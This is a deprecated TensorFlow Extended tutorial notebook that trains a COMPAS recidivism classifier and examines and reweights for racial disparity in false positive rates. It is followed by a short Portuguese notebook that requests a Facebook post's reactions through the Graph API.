# Now let's define a module containing the `preprocessing_fn()` function that we will pass to the `Transform` component:
# + id="83MZZqUQlMkJ"
# Setup paths for the Transform Component.
_transform_module_file = 'compas_transform.py'
# + id="NLzxWiOBlMkL"
# %%writefile {_transform_module_file}
import tensorflow as tf
import tensorflow_transform as tft
CATEGORICAL_FEATURE_KEYS = [
'sex',
'race',
'c_charge_desc',
'c_charge_degree',
]
INT_FEATURE_KEYS = [
'age',
'c_days_from_compas',
'juv_fel_count',
'juv_misd_count',
'juv_other_count',
'priors_count',
'sample_weight',
]
LABEL_KEY = 'is_recid'
# List of the unique values for the items within CATEGORICAL_FEATURE_KEYS.
MAX_CATEGORICAL_FEATURE_VALUES = [
2,
6,
513,
14,
]
def transformed_name(key):
return '{}_xf'.format(key)
def preprocessing_fn(inputs):
"""tf.transform's callback function for preprocessing inputs.
Args:
inputs: Map from feature keys to raw features.
Returns:
Map from string feature key to transformed feature operations.
"""
outputs = {}
for key in CATEGORICAL_FEATURE_KEYS:
outputs[transformed_name(key)] = tft.compute_and_apply_vocabulary(
_fill_in_missing(inputs[key]),
vocab_filename=key)
for key in INT_FEATURE_KEYS:
outputs[transformed_name(key)] = tft.scale_to_z_score(
_fill_in_missing(inputs[key]))
# Target label will be to see if the defendant is charged for another crime.
outputs[transformed_name(LABEL_KEY)] = _fill_in_missing(inputs[LABEL_KEY])
return outputs
def _fill_in_missing(tensor_value):
"""Replaces a missing values in a SparseTensor.
Fills in missing values of `tensor_value` with '' or 0, and converts to a
dense tensor.
Args:
tensor_value: A `SparseTensor` of rank 2. Its dense shape should have size
at most 1 in the second dimension.
Returns:
A rank 1 tensor where missing values of `tensor_value` are filled in.
"""
if not isinstance(tensor_value, tf.sparse.SparseTensor):
return tensor_value
default_value = '' if tensor_value.dtype == tf.string else 0
sparse_tensor = tf.SparseTensor(
tensor_value.indices,
tensor_value.values,
[tensor_value.dense_shape[0], 1])
dense_tensor = tf.sparse.to_dense(sparse_tensor, default_value)
return tf.squeeze(dense_tensor, axis=1)
# + id="5yzFOQrPlMkM"
# Build and run the Transform Component.
transform = Transform(
examples=example_gen.outputs['examples'],
schema=infer_schema.outputs['schema'],
module_file=_transform_module_file
)
context.run(transform)
# + [markdown] id="A_ubj158lMkP"
# ### TFX Trainer Component
# The `Trainer` Component trains a specified TensorFlow model.
#
# In order to run the trainer component we need to create a Python module containing a `trainer_fn` function that will return an estimator for our model. If you prefer creating a Keras model, you can do so and then convert it to an estimator using `keras.model_to_estimator()`.
#
# The `Trainer` component trains a specified TensorFlow model. In order to run the model we need to create a Python module containing a a function called `trainer_fn` function that TFX will call.
#
# For our case study we will build a Keras model that will return will return [`keras.model_to_estimator()`](https://www.tensorflow.org/api_docs/python/tf/keras/estimator/model_to_estimator).
# + id="K9zxx6CnlMkQ"
# Setup paths for the Trainer Component.
_trainer_module_file = 'compas_trainer.py'
# + id="KhuwfYIRlMkR"
# %%writefile {_trainer_module_file}
import tensorflow as tf
import tensorflow_model_analysis as tfma
import tensorflow_transform as tft
from tensorflow_transform.tf_metadata import schema_utils
from compas_transform import *
_BATCH_SIZE = 1000
_LEARNING_RATE = 0.00001
_MAX_CHECKPOINTS = 1
_SAVE_CHECKPOINT_STEPS = 999
def transformed_names(keys):
return [transformed_name(key) for key in keys]
def transformed_name(key):
return '{}_xf'.format(key)
def _gzip_reader_fn(filenames):
"""Returns a record reader that can read gzip'ed files.
Args:
filenames: A tf.string tensor or tf.data.Dataset containing one or more
filenames.
Returns: A nested structure of tf.TypeSpec objects matching the structure of
an element of this dataset and specifying the type of individual components.
"""
return tf.data.TFRecordDataset(filenames, compression_type='GZIP')
# Tf.Transform considers these features as "raw".
def _get_raw_feature_spec(schema):
"""Generates a feature spec from a Schema proto.
Args:
schema: A Schema proto.
Returns:
A feature spec defined as a dict whose keys are feature names and values are
instances of FixedLenFeature, VarLenFeature or SparseFeature.
"""
return schema_utils.schema_as_feature_spec(schema).feature_spec
def _example_serving_receiver_fn(tf_transform_output, schema):
"""Builds the serving in inputs.
Args:
tf_transform_output: A TFTransformOutput.
schema: the schema of the input data.
Returns:
TensorFlow graph which parses examples, applying tf-transform to them.
"""
raw_feature_spec = _get_raw_feature_spec(schema)
raw_feature_spec.pop(LABEL_KEY)
raw_input_fn = tf.estimator.export.build_parsing_serving_input_receiver_fn(
raw_feature_spec)
serving_input_receiver = raw_input_fn()
transformed_features = tf_transform_output.transform_raw_features(
serving_input_receiver.features)
transformed_features.pop(transformed_name(LABEL_KEY))
return tf.estimator.export.ServingInputReceiver(
transformed_features, serving_input_receiver.receiver_tensors)
def _eval_input_receiver_fn(tf_transform_output, schema):
"""Builds everything needed for the tf-model-analysis to run the model.
Args:
tf_transform_output: A TFTransformOutput.
schema: the schema of the input data.
Returns:
EvalInputReceiver function, which contains:
- TensorFlow graph which parses raw untransformed features, applies the
tf-transform preprocessing operators.
- Set of raw, untransformed features.
- Label against which predictions will be compared.
"""
# Notice that the inputs are raw features, not transformed features here.
raw_feature_spec = _get_raw_feature_spec(schema)
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string, shape=[None], name='input_example_tensor')
# Add a parse_example operator to the tensorflow graph, which will parse
# raw, untransformed, tf examples.
features = tf.io.parse_example(
serialized=serialized_tf_example, features=raw_feature_spec)
transformed_features = tf_transform_output.transform_raw_features(features)
labels = transformed_features.pop(transformed_name(LABEL_KEY))
receiver_tensors = {'examples': serialized_tf_example}
return tfma.export.EvalInputReceiver(
features=transformed_features,
receiver_tensors=receiver_tensors,
labels=labels)
def _input_fn(filenames, tf_transform_output, batch_size=200):
"""Generates features and labels for training or evaluation.
Args:
filenames: List of CSV files to read data from.
tf_transform_output: A TFTransformOutput.
batch_size: First dimension size of the Tensors returned by input_fn.
Returns:
A (features, indices) tuple where features is a dictionary of
Tensors, and indices is a single Tensor of label indices.
"""
transformed_feature_spec = (
tf_transform_output.transformed_feature_spec().copy())
dataset = tf.compat.v1.data.experimental.make_batched_features_dataset(
filenames,
batch_size,
transformed_feature_spec,
shuffle=False,
reader=_gzip_reader_fn)
transformed_features = dataset.make_one_shot_iterator().get_next()
# We pop the label because we do not want to use it as a feature while we're
# training.
return transformed_features, transformed_features.pop(
transformed_name(LABEL_KEY))
def _keras_model_builder():
"""Build a keras model for COMPAS dataset classification.
Returns:
A compiled Keras model.
"""
feature_columns = []
feature_layer_inputs = {}
for key in transformed_names(INT_FEATURE_KEYS):
feature_columns.append(tf.feature_column.numeric_column(key))
feature_layer_inputs[key] = tf.keras.Input(shape=(1,), name=key)
for key, num_buckets in zip(transformed_names(CATEGORICAL_FEATURE_KEYS),
MAX_CATEGORICAL_FEATURE_VALUES):
feature_columns.append(
tf.feature_column.indicator_column(
tf.feature_column.categorical_column_with_identity(
key, num_buckets=num_buckets)))
feature_layer_inputs[key] = tf.keras.Input(
shape=(1,), name=key, dtype=tf.dtypes.int32)
feature_columns_input = tf.keras.layers.DenseFeatures(feature_columns)
feature_layer_outputs = feature_columns_input(feature_layer_inputs)
dense_layers = tf.keras.layers.Dense(
20, activation='relu', name='dense_1')(feature_layer_outputs)
dense_layers = tf.keras.layers.Dense(
10, activation='relu', name='dense_2')(dense_layers)
output = tf.keras.layers.Dense(
1, name='predictions')(dense_layers)
model = tf.keras.Model(
inputs=[v for v in feature_layer_inputs.values()], outputs=output)
model.compile(
loss=tf.keras.losses.MeanAbsoluteError(),
optimizer=tf.optimizers.Adam(learning_rate=_LEARNING_RATE))
return model
# TFX will call this function.
def trainer_fn(hparams, schema):
"""Build the estimator using the high level API.
Args:
hparams: Hyperparameters used to train the model as name/value pairs.
schema: Holds the schema of the training examples.
Returns:
A dict of the following:
- estimator: The estimator that will be used for training and eval.
- train_spec: Spec for training.
- eval_spec: Spec for eval.
- eval_input_receiver_fn: Input function for eval.
"""
tf_transform_output = tft.TFTransformOutput(hparams.transform_output)
train_input_fn = lambda: _input_fn(
hparams.train_files,
tf_transform_output,
batch_size=_BATCH_SIZE)
eval_input_fn = lambda: _input_fn(
hparams.eval_files,
tf_transform_output,
batch_size=_BATCH_SIZE)
train_spec = tf.estimator.TrainSpec(
train_input_fn,
max_steps=hparams.train_steps)
serving_receiver_fn = lambda: _example_serving_receiver_fn(
tf_transform_output, schema)
exporter = tf.estimator.FinalExporter('compas', serving_receiver_fn)
eval_spec = tf.estimator.EvalSpec(
eval_input_fn,
steps=hparams.eval_steps,
exporters=[exporter],
name='compas-eval')
run_config = tf.estimator.RunConfig(
save_checkpoints_steps=_SAVE_CHECKPOINT_STEPS,
keep_checkpoint_max=_MAX_CHECKPOINTS)
run_config = run_config.replace(model_dir=hparams.serving_model_dir)
estimator = tf.keras.estimator.model_to_estimator(
keras_model=_keras_model_builder(), config=run_config)
# Create an input receiver for TFMA processing.
receiver_fn = lambda: _eval_input_receiver_fn(tf_transform_output, schema)
return {
'estimator': estimator,
'train_spec': train_spec,
'eval_spec': eval_spec,
'eval_input_receiver_fn': receiver_fn
}
# + id="oiC1wABllMkU"
# Uses user-provided Python function that implements a model using TensorFlow's
# Estimators API.
trainer = Trainer(
module_file=_trainer_module_file,
transformed_examples=transform.outputs['transformed_examples'],
schema=infer_schema.outputs['schema'],
transform_graph=transform.outputs['transform_graph'],
train_args=trainer_pb2.TrainArgs(num_steps=10000),
eval_args=trainer_pb2.EvalArgs(num_steps=5000)
)
context.run(trainer)
# + [markdown] id="0tfnGpl2lMkv"
# ## TensorFlow Model Analysis
#
# Now that our model is trained developed and trained within TFX, we can use several additional components within the TFX exosystem to understand our models performance in a little more detail. By looking at different metrics we’re able to get a better picture of how the overall model performs for different slices within our model to make sure our model is not underperforming for any subgroup.
#
# First we'll examine TensorFlow Model Analysis, which is a library for evaluating TensorFlow models. It allows users to evaluate their models on large amounts of data in a distributed manner, using the same metrics defined in their trainer. These metrics can be computed over different slices of data and visualized in a notebook.
#
# For a list of possible metrics that can be added into TensorFlow Model Analysis see [here](https://github.com/tensorflow/model-analysis/blob/master/g3doc/metrics.md).
#
# + id="i8VdZ4z3lMk0"
# Uses TensorFlow Model Analysis to compute a evaluation statistics over
# features of a model.
model_analyzer = Evaluator(
examples=example_gen.outputs['examples'],
model=trainer.outputs['model'],
eval_config = text_format.Parse("""
model_specs {
label_key: 'is_recid'
}
metrics_specs {
metrics {class_name: "BinaryAccuracy"}
metrics {class_name: "AUC"}
metrics {
class_name: "FairnessIndicators"
config: '{"thresholds": [0.25, 0.5, 0.75]}'
}
}
slicing_specs {
feature_keys: 'race'
}
""", tfma.EvalConfig())
)
context.run(model_analyzer)
# + [markdown] id="gXGxPEAnBkUM"
# ## Fairness Indicators
#
# Load Fairness Indicators to examine the underlying data.
# + id="4ZgUtH_OBg2x"
evaluation_uri = model_analyzer.outputs['evaluation'].get()[0].uri
eval_result = tfma.load_eval_result(evaluation_uri)
tfma.addons.fairness.view.widget_view.render_fairness_indicator(eval_result)
# + [markdown] id="igoChEEblMk4"
# Fairness Indicators will allow us to drill down to see the performance of different slices and is designed to support teams in evaluating and improving models for fairness concerns. It enables easy computation of binary and multiclass classifiers and will allow you to evaluate across any size of use case.
#
# We willl load Fairness Indicators into this notebook and analyse the results and take a look at the results. After you have had a moment explored with Fairness Indicators, examine the False Positive Rate and False Negative Rate tabs in the tool. In this case study, we're concerned with trying to reduce the number of false predictions of recidivism, corresponding to the [False Positive Rate](https://en.wikipedia.org/wiki/Receiver_operating_characteristic).
#
# 
#
# Within Fairness Indicator tool you'll see two dropdowns options:
# 1. A "Baseline" option that is set by `column_for_slicing`.
# 2. A "Thresholds" option that is set by `fairness_indicator_thresholds`.
#
# “Baseline” is the slice you want to compare all other slices to. Most commonly, it is represented by the overall slice, but can also be one of the specific slices as well.
#
# "Threshold" is a value set within a given binary classification model to indicate where a prediction should be placed. When setting a threshold there are two things you should keep in mind.
#
# 1. Precision: What is the downside if your prediction results in a Type 1 error? In this case study a higher threshold would mean we're predicting more defendants *will* commit another crime when they actually *don't*.
# 2. Recall: What is the downside of a Type II error? In this case study a higher threshold would mean we're predicting more defendants *will not* commit another crime when they actually *do*.
#
# We will set arbitrary thresholds at 0.75 and we will only focus on the fairness metrics for African-American and Caucasian defendants given the small sample sizes for the other races, which aren’t large enough to draw statistically significant conclusions.
#
# The rates of the below might differ slightly based on how the data was shuffled at the beginning of this case study, but take a look at the difference between the data between African-American and Caucasian defendants. At a lower threshold our model is more likely to predict that a Caucasian defended will commit a second crime compared to an African-American defended. However this prediction inverts as we increase our threshold.
#
# * **False Positive Rate @ 0.75**
# * **African-American:** ~30%
# * AUC: 0.71
# * Binary Accuracy: 0.67
# * **Caucasian:** ~8%
# * AUC: 0.71
# * AUC: 0.67
#
# More information on Type I/II errors and threshold setting can be found [here](https://developers.google.com/machine-learning/crash-course/classification/thresholding).
#
# + [markdown] id="Mpbs4x9dB2PA"
# ## ML Metadata
#
# To understand where disparity could be coming from and to take a snapshot of our current model, we can use ML Metadata for recording and retrieving metadata associated with our model. ML Metadata is an integral part of TFX, but is designed so that it can be used independently.
#
# For this case study, we will list all artifacts that we developed previously within this case study. By cycling through the artifacts, executions, and context we will have a high level view of our TFX model to dig into where any potential issues are coming from. This will provide us a baseline overview of how our model was developed and what TFX components helped to develop our initial model.
#
# We will start by first laying out the high level artifacts, execution, and context types in our model.
#
# + id="0wjiFKOxlMkn"
# Connect to the TFX database.
connection_config = metadata_store_pb2.ConnectionConfig()
connection_config.sqlite.filename_uri = os.path.join(
context.pipeline_root, 'metadata.sqlite')
store = metadata_store.MetadataStore(connection_config)
def _mlmd_type_to_dataframe(mlmd_type):
"""Helper function to turn MLMD into a Pandas DataFrame.
Args:
mlmd_type: Metadata store type.
Returns:
DataFrame containing type ID, Name, and Properties.
"""
pd.set_option('display.max_columns', None)
pd.set_option('display.expand_frame_repr', False)
column_names = ['ID', 'Name', 'Properties']
df = pd.DataFrame(columns=column_names)
for a_type in mlmd_type:
mlmd_row = pd.DataFrame([[a_type.id, a_type.name, a_type.properties]],
columns=column_names)
df = df.append(mlmd_row)
return df
# ML Metadata stores strong-typed Artifacts, Executions, and Contexts.
# First, we can use type APIs to understand what is defined in ML Metadata
# by the current version of TFX. We'll be able to view all the previous runs
# that created our initial model.
print('Artifact Types:')
display(_mlmd_type_to_dataframe(store.get_artifact_types()))
print('\nExecution Types:')
display(_mlmd_type_to_dataframe(store.get_execution_types()))
print('\nContext Types:')
display(_mlmd_type_to_dataframe(store.get_context_types()))
# + [markdown] id="lJQoer33ZEXD"
# ## Identify where the fairness issue could be coming from
#
# For each of the above artifacts, execution, and context types we can use ML Metadata to dig into the attributes and how each part of our ML pipeline was developed.
#
# We'll start by diving into the `StatisticsGen` to examine the underlying data that we initially fed into the model. By knowing the artifacts within our model we can use ML Metadata and TensorFlow Data Validation to look backward and forward within the model to identify where a potential problem is coming from.
#
# After running the below cell, select `Lift (Y=1)` in the second chart on the `Chart to show` tab to see the [lift](https://en.wikipedia.org/wiki/Lift_(data_mining)) between the different data slices. Within `race`, the lift for African-American is approximatly 1.08 whereas Caucasian is approximatly 0.86.
# + id="xvcw9KL0byeY"
statistics_gen = StatisticsGen(
examples=example_gen.outputs['examples'],
schema=infer_schema.outputs['schema'],
stats_options=tfdv.StatsOptions(label_feature='is_recid'))
exec_result = context.run(statistics_gen)
for event in store.get_events_by_execution_ids([exec_result.execution_id]):
if event.path.steps[0].key == 'statistics':
statistics_w_schema_uri = store.get_artifacts_by_id([event.artifact_id])[0].uri
model_stats = tfdv.load_statistics(
os.path.join(statistics_w_schema_uri, 'eval/stats_tfrecord/'))
tfdv.visualize_statistics(model_stats)
# + [markdown] id="ofWXz48zzlGT"
# ## Tracking a Model Change
#
# Now that we have an idea on how we could improve the fairness of our model, we will first document our initial run within the ML Metadata for our own record and for anyone else that might review our changes at a future time.
#
# ML Metadata can keep a log of our past models along with any notes that we would like to add between runs. We'll add a simple note on our first run denoting that this run was done on the full COMPAS dataset
# + id="GCQ-7kzMRbXM"
_MODEL_NOTE_TO_ADD = 'First model that contains fairness concerns in the model.'
first_trained_model = store.get_artifacts_by_type('Model')[-1]
# Add the two notes above to the ML metadata.
first_trained_model.custom_properties['note'].string_value = _MODEL_NOTE_TO_ADD
store.put_artifacts([first_trained_model])
def _mlmd_model_to_dataframe(model, model_number):
"""Helper function to turn a MLMD modle into a Pandas DataFrame.
Args:
model: Metadata store model.
model_number: Number of model run within ML Metadata.
Returns:
DataFrame containing the ML Metadata model.
"""
pd.set_option('display.max_columns', None)
pd.set_option('display.expand_frame_repr', False)
df = pd.DataFrame()
custom_properties = ['name', 'note', 'state', 'producer_component',
'pipeline_name']
df['id'] = [model[model_number].id]
df['uri'] = [model[model_number].uri]
for prop in custom_properties:
df[prop] = model[model_number].custom_properties.get(prop)
df[prop] = df[prop].astype(str).map(
lambda x: x.lstrip('string_value: "').rstrip('"\n'))
return df
# Print the current model to see the results of the ML Metadata for the model.
display(_mlmd_model_to_dataframe(store.get_artifacts_by_type('Model'), 0))
# + [markdown] id="-gwiNtcoeO8S"
# ## Improving fairness concerns by weighting the model
#
#
# There are several ways we can approach fixing fairness concerns within a model. Manipulating observed data/labels, implementing fairness constraints, or prejudice removal by regularization are some techniques<sup>1</sup> that have been used to fix fairness concerns. In this case study we will reweight the model by implementing a custom loss function into Keras.
#
# The code below is the same as the above Transform Component but with the exception of a new class called `LogisticEndpoint` that we will use for our loss within Keras and a few parameter changes.
#
# ___
#
# 1. <NAME>., <NAME>., <NAME>., <NAME>., <NAME>. (2019). A Survey on Bias and Fairness in Machine Learning. https://arxiv.org/pdf/1908.09635.pdf
#
# + id="yzLWm3-1Zjvv"
# %%writefile {_trainer_module_file}
import numpy as np
import tensorflow as tf
import tensorflow_model_analysis as tfma
import tensorflow_transform as tft
from tensorflow_transform.tf_metadata import schema_utils
from compas_transform import *
_BATCH_SIZE = 1000
_LEARNING_RATE = 0.00001
_MAX_CHECKPOINTS = 1
_SAVE_CHECKPOINT_STEPS = 999
def transformed_names(keys):
return [transformed_name(key) for key in keys]
def transformed_name(key):
return '{}_xf'.format(key)
def _gzip_reader_fn(filenames):
"""Returns a record reader that can read gzip'ed files.
Args:
filenames: A tf.string tensor or tf.data.Dataset containing one or more
filenames.
Returns: A nested structure of tf.TypeSpec objects matching the structure of
an element of this dataset and specifying the type of individual components.
"""
return tf.data.TFRecordDataset(filenames, compression_type='GZIP')
# Tf.Transform considers these features as "raw".
def _get_raw_feature_spec(schema):
"""Generates a feature spec from a Schema proto.
Args:
schema: A Schema proto.
Returns:
A feature spec defined as a dict whose keys are feature names and values are
instances of FixedLenFeature, VarLenFeature or SparseFeature.
"""
return schema_utils.schema_as_feature_spec(schema).feature_spec
def _example_serving_receiver_fn(tf_transform_output, schema):
"""Builds the serving in inputs.
Args:
tf_transform_output: A TFTransformOutput.
schema: the schema of the input data.
Returns:
TensorFlow graph which parses examples, applying tf-transform to them.
"""
raw_feature_spec = _get_raw_feature_spec(schema)
raw_feature_spec.pop(LABEL_KEY)
raw_input_fn = tf.estimator.export.build_parsing_serving_input_receiver_fn(
raw_feature_spec)
serving_input_receiver = raw_input_fn()
transformed_features = tf_transform_output.transform_raw_features(
serving_input_receiver.features)
transformed_features.pop(transformed_name(LABEL_KEY))
return tf.estimator.export.ServingInputReceiver(
transformed_features, serving_input_receiver.receiver_tensors)
def _eval_input_receiver_fn(tf_transform_output, schema):
"""Builds everything needed for the tf-model-analysis to run the model.
Args:
tf_transform_output: A TFTransformOutput.
schema: the schema of the input data.
Returns:
EvalInputReceiver function, which contains:
- TensorFlow graph which parses raw untransformed features, applies the
tf-transform preprocessing operators.
- Set of raw, untransformed features.
- Label against which predictions will be compared.
"""
# Notice that the inputs are raw features, not transformed features here.
raw_feature_spec = _get_raw_feature_spec(schema)
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string, shape=[None], name='input_example_tensor')
# Add a parse_example operator to the tensorflow graph, which will parse
# raw, untransformed, tf examples.
features = tf.io.parse_example(
serialized=serialized_tf_example, features=raw_feature_spec)
transformed_features = tf_transform_output.transform_raw_features(features)
labels = transformed_features.pop(transformed_name(LABEL_KEY))
receiver_tensors = {'examples': serialized_tf_example}
return tfma.export.EvalInputReceiver(
features=transformed_features,
receiver_tensors=receiver_tensors,
labels=labels)
def _input_fn(filenames, tf_transform_output, batch_size=200):
"""Generates features and labels for training or evaluation.
Args:
filenames: List of CSV files to read data from.
tf_transform_output: A TFTransformOutput.
batch_size: First dimension size of the Tensors returned by input_fn.
Returns:
A (features, indices) tuple where features is a dictionary of
Tensors, and indices is a single Tensor of label indices.
"""
transformed_feature_spec = (
tf_transform_output.transformed_feature_spec().copy())
dataset = tf.compat.v1.data.experimental.make_batched_features_dataset(
filenames,
batch_size,
transformed_feature_spec,
shuffle=False,
reader=_gzip_reader_fn)
transformed_features = dataset.make_one_shot_iterator().get_next()
# We pop the label because we do not want to use it as a feature while we're
# training.
return transformed_features, transformed_features.pop(
transformed_name(LABEL_KEY))
# TFX will call this function.
def trainer_fn(hparams, schema):
"""Build the estimator using the high level API.
Args:
hparams: Hyperparameters used to train the model as name/value pairs.
schema: Holds the schema of the training examples.
Returns:
A dict of the following:
- estimator: The estimator that will be used for training and eval.
- train_spec: Spec for training.
- eval_spec: Spec for eval.
- eval_input_receiver_fn: Input function for eval.
"""
tf_transform_output = tft.TFTransformOutput(hparams.transform_output)
train_input_fn = lambda: _input_fn(
hparams.train_files,
tf_transform_output,
batch_size=_BATCH_SIZE)
eval_input_fn = lambda: _input_fn(
hparams.eval_files,
tf_transform_output,
batch_size=_BATCH_SIZE)
train_spec = tf.estimator.TrainSpec(
train_input_fn,
max_steps=hparams.train_steps)
serving_receiver_fn = lambda: _example_serving_receiver_fn(
tf_transform_output, schema)
exporter = tf.estimator.FinalExporter('compas', serving_receiver_fn)
eval_spec = tf.estimator.EvalSpec(
eval_input_fn,
steps=hparams.eval_steps,
exporters=[exporter],
name='compas-eval')
run_config = tf.estimator.RunConfig(
save_checkpoints_steps=_SAVE_CHECKPOINT_STEPS,
keep_checkpoint_max=_MAX_CHECKPOINTS)
run_config = run_config.replace(model_dir=hparams.serving_model_dir)
estimator = tf.keras.estimator.model_to_estimator(
keras_model=_keras_model_builder(), config=run_config)
# Create an input receiver for TFMA processing.
receiver_fn = lambda: _eval_input_receiver_fn(tf_transform_output, schema)
return {
'estimator': estimator,
'train_spec': train_spec,
'eval_spec': eval_spec,
'eval_input_receiver_fn': receiver_fn
}
def _keras_model_builder():
"""Build a keras model for COMPAS dataset classification.
Returns:
A compiled Keras model.
"""
feature_columns = []
feature_layer_inputs = {}
for key in transformed_names(INT_FEATURE_KEYS):
feature_columns.append(tf.feature_column.numeric_column(key))
feature_layer_inputs[key] = tf.keras.Input(shape=(1,), name=key)
for key, num_buckets in zip(transformed_names(CATEGORICAL_FEATURE_KEYS),
MAX_CATEGORICAL_FEATURE_VALUES):
feature_columns.append(
tf.feature_column.indicator_column(
tf.feature_column.categorical_column_with_identity(
key, num_buckets=num_buckets)))
feature_layer_inputs[key] = tf.keras.Input(
shape=(1,), name=key, dtype=tf.dtypes.int32)
feature_columns_input = tf.keras.layers.DenseFeatures(feature_columns)
feature_layer_outputs = feature_columns_input(feature_layer_inputs)
dense_layers = tf.keras.layers.Dense(
20, activation='relu', name='dense_1')(feature_layer_outputs)
dense_layers = tf.keras.layers.Dense(
10, activation='relu', name='dense_2')(dense_layers)
output = tf.keras.layers.Dense(
1, name='predictions')(dense_layers)
model = tf.keras.Model(
inputs=[v for v in feature_layer_inputs.values()], outputs=output)
# To weight our model we will develop a custom loss class within Keras.
# The old loss is commented out below and the new one is added in below.
model.compile(
# loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
loss=LogisticEndpoint(),
optimizer=tf.optimizers.Adam(learning_rate=_LEARNING_RATE))
return model
class LogisticEndpoint(tf.keras.layers.Layer):
def __init__(self, name=None):
super(LogisticEndpoint, self).__init__(name=name)
self.loss_fn = tf.keras.losses.BinaryCrossentropy(from_logits=True)
def __call__(self, y_true, y_pred, sample_weight=None):
inputs = [y_true, y_pred]
inputs += sample_weight or ['sample_weight_xf']
return super(LogisticEndpoint, self).__call__(inputs)
def call(self, inputs):
y_true, y_pred = inputs[0], inputs[1]
if len(inputs) == 3:
sample_weight = inputs[2]
else:
sample_weight = None
loss = self.loss_fn(y_true, y_pred, sample_weight)
self.add_loss(loss)
reduce_loss = tf.math.divide_no_nan(
tf.math.reduce_sum(tf.nn.softmax(y_pred)), _BATCH_SIZE)
return reduce_loss
# + [markdown] id="thSmshFN94pt"
# ## Retrain the TFX model with the weighted model
#
# In this next part we will use the weighted Transform Component to rerun the same Trainer model as before to see the improvement in fairness after the weighting is applied.
# + id="Bb0Rl9UOFgoM"
trainer_weighted = Trainer(
module_file=_trainer_module_file,
transformed_examples=transform.outputs['transformed_examples'],
schema=infer_schema.outputs['schema'],
transform_graph=transform.outputs['transform_graph'],
train_args=trainer_pb2.TrainArgs(num_steps=10000),
eval_args=trainer_pb2.EvalArgs(num_steps=5000)
)
context.run(trainer_weighted)
# + id="n7xH61MCPwUO"
# Again, we will run TensorFlow Model Analysis and load Fairness Indicators
# to examine the performance change in our weighted model.
model_analyzer_weighted = Evaluator(
examples=example_gen.outputs['examples'],
model=trainer_weighted.outputs['model'],
eval_config = text_format.Parse("""
model_specs {
label_key: 'is_recid'
}
metrics_specs {
metrics {class_name: 'BinaryAccuracy'}
metrics {class_name: 'AUC'}
metrics {
class_name: 'FairnessIndicators'
config: '{"thresholds": [0.25, 0.5, 0.75]}'
}
}
slicing_specs {
feature_keys: 'race'
}
""", tfma.EvalConfig())
)
context.run(model_analyzer_weighted)
# + id="206gQS1r-1FX"
evaluation_uri_weighted = model_analyzer_weighted.outputs['evaluation'].get()[0].uri
eval_result_weighted = tfma.load_eval_result(evaluation_uri_weighted)
multi_eval_results = {
'Unweighted Model': eval_result,
'Weighted Model': eval_result_weighted
}
tfma.addons.fairness.view.widget_view.render_fairness_indicator(
multi_eval_results=multi_eval_results)
# + [markdown] id="bwoz69Wzvt8q"
# After retraining our results with the weighted model, we can once again look at the fairness metrics to gauge any improvements in the model. This time, however, we will use the model comparison feature within Fairness Indicators to see the difference between the weighted and unweighted model. Although we’re still seeing some fairness concerns with the weighted model, the discrepancy is far less pronounced.
#
# The drawback, however, is that our AUC and binary accuracy has also dropped after weighting the model.
#
#
# * **False Positive Rate @ 0.75**
# * **African-American:** ~1%
# * AUC: 0.47
# * Binary Accuracy: 0.59
# * **Caucasian:** ~0%
# * AUC: 0.47
# * Binary Accuracy: 0.58
#
# + [markdown] id="oEhq3ne7gazf"
# ## Examine the data of the second run
#
# Finally, we can visualize the data with TensorFlow Data Validation and overlay the data changes between the two models and add an additional note to the ML Metadata indicating that this model has improved the fairness concerns.
# + id="WM-uqqfOggcw"
# Pull the URI for the two models that we ran in this case study.
first_model_uri = store.get_artifacts_by_type('ExampleStatistics')[-1].uri
second_model_uri = store.get_artifacts_by_type('ExampleStatistics')[0].uri
# Load the stats for both models.
first_model_uri = tfdv.load_statistics(os.path.join(
first_model_uri, 'eval/stats_tfrecord/'))
second_model_stats = tfdv.load_statistics(os.path.join(
second_model_uri, 'eval/stats_tfrecord/'))
# Visualize the statistics between the two models.
tfdv.visualize_statistics(
lhs_statistics=second_model_stats,
lhs_name='Sampled Model',
rhs_statistics=first_model_uri,
rhs_name='COMPAS Orginal')
# + id="YOMbqITkhNkO"
# Add a new note within ML Metadata describing the weighted model.
_NOTE_TO_ADD = 'Weighted model between race and is_recid.'
# Pulling the URI for the weighted trained model.
second_trained_model = store.get_artifacts_by_type('Model')[-1]
# Add the note to ML Metadata.
second_trained_model.custom_properties['note'].string_value = _NOTE_TO_ADD
store.put_artifacts([second_trained_model])
display(_mlmd_model_to_dataframe(store.get_artifacts_by_type('Model'), -1))
display(_mlmd_model_to_dataframe(store.get_artifacts_by_type('Model'), 0))
# + [markdown] id="f0fGWt-OIzEb"
# ## Conclusion
#
# Within this case study we developed a Keras classifier within a TFX pipeline with the COMPAS dataset to examine any fairness concerns within the dataset. After initially developing the TFX, fairness concerns were not immediately apparent until examining the individual slices within our model by our sensitive features --in our case race. After identifying the issues, we were able to track down the source of the fairness issue with TensorFlow DataValidation to identify a method to mitigate the fairness concerns via model weighting while tracking and annotating the changes via ML Metadata. Although we are not able to fully fix all the fairness concerns within the dataset, by adding a note for future developers to follow will allow others to understand and issues we faced while developing this model.
#
# Finally it is important to note that this case study did not fix the fairness issues that are present in the COMPAS dataset. By improving the fairness concerns in the model we also reduced the AUC and accuracy in the performance of the model. What we were able to do, however, was build a model that showcased the fairness concerns and track down where the problems could be coming from by tracking or model's lineage while annotating any model concerns within the metadata.
#
# For more information on the issues that the predicting pre-trial detention can have see the FAT* 2018 talk on ["Understanding the Context and Consequences of Pre-trial Detention"](https://www.youtube.com/watch?v=hEThGT-_5ho&feature=youtu.be&t=1)
| g3doc/tutorials/_Deprecated_Fairness_Indicators_Lineage_Case_Study.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Recuperando as reações de um post
import requests
# Iremos definir a URL base para realizar as requisições.
url_base = 'https://graph.facebook.com/v2.7'
# Agora, iremos utilizar um nó (post) que recuperamos na aula passada.
id_post = '/134488303306371_1056521637769695'
no = id_post
# Vamos criar a parte da URL em que definimos os campos que queremos recuperar. No caso é o reactions.
campos = '/?fields=reactions'
# Por fim, temos que criar a parte da URL que contém o token de acesso.
access_token = '&access_token=<KEY>'
url_final = url_base+no+campos+access_token
url_final
# Com a URL final, podemos fazer o requisição.
req = requests.get(url_final).json()
